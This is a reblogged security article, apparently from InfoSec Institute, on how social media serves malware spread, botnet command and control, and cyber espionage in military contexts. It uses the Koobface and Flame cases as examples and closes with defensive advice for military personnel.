Reblogged from source with thanks via @ http://resources.infosecinstitute.com/social-media-use-in-the-military-sector/
Social Media use in the Military Sector
Malware authors are very interested on the use of social media platforms mainly because they could spread malicious code to a wide audience who have low awareness on principal cyber threats.
In a military context, the use of social media could allow attackers to recruit a large number of bots to conduct a successful offensive against critical targets (e.g. critical infrastructures).
Another advantage in exploiting social media platforms is the possibility to target groups of individuals of a selected community who share particular attitudes and habits, typically for cyber espionage purposes.
According to the IBM X-Force 2012 Mid-year Trend and Risk Report, social networks have been the dominant targets of email phishing for more than two years, and drive-by downloads are becoming the principal method of infection.
In the last couple of years, specially crafted malware have been spread through social media allowing large scale attacks as well as APT attacks. Social network platforms have been used for bot recruiting and also for hiding the command and control infrastructure and related traffic.
Malicious codes that hit social media could be grouped into the following categories:
Social network account-stealing malware propose fake authentication forms for cyber espionage purposes.
In many cases, so simple a schema is enough for gathering account credentials and other personal information such as e-mail info and phone numbers.
Binary/scripting malware on 3rd party web-sites for distribution of targeted malware are like backdoors through the vulnerabilities in internet browser plugins.
Both categories are very common and largely used by cyber criminals, but they could also be implemented by groups of state-sponsored hackers to infect large number of machines, to build up a botnet to involve in a cyber-attack such as a DDoS or to conduct an APT attack.
The most popular example of social malware that could be analyzed to understand the schema of attack on a social network is Koobface, a multi-platform malware that targeted users of the social networking websites Facebook, MySpace and Twitter.
Koobface propagates through popular social networking sites by spamming the platforms with a lot of infected URLs that point to compromised sites.
When users click on those links, proposed for example through a platform message, he is redirected to a compromised site used to exploit a vulnerability in his browser and allow malware downloading on the victim’s PC.
Figure 6 – Koobface schema
Social media to host C&C server
What about hiding malware control structure inside social networks?
Despite IRC networks having been surely the most common malware command-and-control model, recently many bootmasters are beginning to use social networks such as Facebook and Twitter as C&C.
The choice is a winner and makes it hard to detect botnet activities. The interactions with social networking sites can be easily automated and “malicious” traffic directed to social media platforms is hard to identify due to large volumes.
Attackers can set up a network of fake profiles on a social network and use them to post a specific set of encrypted commands to malware.
The infected machine queries the “bootmaster” profile for new commands, but botnet having C&C in social media is extremely resilient and allows malware to run for long periods of time.
The attackers have improved their control techniques over time.
Some malicious agents in fact don’t limit their activity to just interpreting messages from social networking but also receive commands hidden inside a picture posted by a profile related to the bootmaster.
Figure 7 – Example Botnet based on Social Networks
One of the principal military use of social media is cyber espionage.
Most popular techniques include:
Replacement of identity: the ability to impersonate another user to acquire information.
Identity spoofing: the creation of a fake profile that does not match any existing person.
Malware-based attacks: use of malicious code to compromise a victim’s machine and steal sensitive information.
Sharing a link on a compromised website could allow an attacker to exploit vulnerability in a user’s browser to gain control of its PC.
Cyber espionage through social media (facts, statistics, and technologies) is essentially based on data mining through the linked networks of contacts.
The use of social media can be useful for cyber espionage and cyber intelligence in the preparation stage for PSYOPS/CYBEROPS, for reconnaissance (intelligence), and for targeted regions (like a group of persons, or political party, journalists and etc., or the employees of a targeted company and etc.).
Services such as Twitter are already commonly used for geopolitical analysis of so called “protest activities” in different countries, a very useful military segment.
Adopting data mining techniques for contacts and connections analysis makes it possible to establish the relationship between different persons as a part of cyber intelligence operation.
It also helps to gather private contacts of different persons who publish it only to a very close group of people.
The following are two of the most interesting cases of cyber espionage conducted using social media platforms:
NATO’S most senior commander was at the center of a major security alert when a series of his colleagues fell for a fake Facebook account opened in his name – apparently by Chinese spies. (The Telegraph)
In May 2012, a few days before the second round of the presidential election won by Hollande, the President’s office was infected by Flame malware.
The attack against the President’s office was of a spear phishing type that used the popular social network Facebook to spread the malware.
The attackers shared a link to an infected website that was a replica of the Elysee’s intranet, and used it to infect the machines and also to gather user credentials.
All the machines that were part of the presidential network, including a number of Sarkozy’s closest collaborators, were infected by the Flame agent.
Figure 8 – Attack to President’s office occurred in May 2012
Social media platforms have assumed a fundamental role in our society.
Every day, billions of people share information, documents and any kind of content through these platforms.
It is natural that they have become an object of interest for cyber criminals and intelligence agencies.
Undoubtedly, social media is of strategic importance for military sectors, as they offer a mine of information that could be analyzed using different axes of analysis providing efficient and reliable instruments for the study of realities of interest.
Both defense and offense could take advantage of social media introduction.
Social media could be, in fact, used as powerful tool for information gathering, cyber espionage and also as an active component in a botnet infrastructure.
Though social media is also a resource to preserve from attacks, its military use inevitably leads to a widening of the attack surface.
Quite differently from other domains, the military has to deal with an area without perimeter that is difficult to protect.
Rapid technological evolution makes surveillance systems obsolete in a short time.
It is necessary to spend a greater effort for the establishment of early warning and security intelligence systems to identify cyber threats, but other improvements must take place first.
The military needs an opening to social media, but it has to be consciously made.
Military personnel and their families must be instructed on how to manage their exposure to social platforms.
Social media platforms are powerful resources that can carry with them an incredible number of threats, so it’s best to never let your guard down.